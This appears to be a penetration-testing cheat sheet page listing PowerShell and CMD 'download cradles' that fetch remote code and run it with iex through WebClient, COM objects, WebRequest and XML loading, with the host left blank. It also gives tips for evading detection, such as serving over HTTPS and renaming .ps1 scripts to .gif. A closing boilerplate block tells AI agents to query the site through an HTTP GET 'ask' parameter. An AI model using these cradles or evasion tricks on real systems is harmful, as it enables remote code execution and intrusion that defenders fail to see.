# Download and Execution Methods ## Tools In Memory ``` Net.WebClient DownloadString Method Net.WebClient DownloadData Method Net.WebClient OpenRead Method .NET [Net.HttpWebReqest].class Word.Application COM Object Excel.Application COM Object InternetExplorer.Application COM Object MSXML2.ServerXmlHTTP Com Object Certutil.exe w/ -ping argument ``` {% hint style="info" %} If possible use SSL on attacking machine and use HTTPS to further evade detection {% endhint %} {% hint style="info" %} Further evade detection by renaming scripts from .ps1 to something else such as .gif. Powershell can still execute .gif files as Powershell files. {% endhint %} {% hint style="info" %} Multi command scripts below can be converted to one line with ';' between commands. {% endhint %} **On Disk** ``` Net.WebClient DownloadFile Method BITSAdmin.exe Cerutil.exe w/ -urlcahche argument ``` **Net.WebClient Download String Method** {% tabs %} {% tab title="Powershell" %} ```powershell # Standard download cradle iex (New-Object Net.Webclient).DownloadString("http:///") # Internet Explorer Downoad cradle $ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http:/// ');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response # Requires PowerShell V3+ iex (iwr 'http:///') $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http:///',$false);$h.send();iex $h.responseText $wr = [System.NET.WebRequest]::Create("http:///") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd() ``` {% endtab %} {% tab title="CMD" %} ```batch powershell.exe iex (New-Object Net.Webclient).DownloadString('http:///') ``` {% endtab %} {% endtabs %} **Net.WebClient Single Quotes Download and store** {% tabs %} {% tab title="Powershell" %} ```markup iex (new-Object Net.WebClient).DownloadFile('http:///', 'C:\programdata\') ``` {% endtab %} {% tab title="CMD" %} ``` powershell.exe iex (new-Object Net.WebClient).DownloadFile('http:///', 'C:\programdata\') ``` {% endtab %} {% endtabs %} **Net.WebClient User Agent Download** ``` $downloader = New-Object System.Net.WebClient $downloader.Headers.Add ("") $payload = "http:///" $command = $downloader.DownloadString($payload) iex $command ``` ## XML Download and execute. ```aspnet $xmldoc = New-Object System.Xml.XmlDocument $xmldoc.Load("http:///") iex $xmldoc.command.a.execute ``` ### One Line ```markup $xmldoc = New-Object System.Xml.XmlDocument ; $xmldoc.Load("http:///") ; iex $xmldoc.command.a.execute ``` ### Script Example {% tabs %} {% tab title="Execute.xml" %} ```markup Get-Process ``` {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/everything/powershell/download-and-execution-methods.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.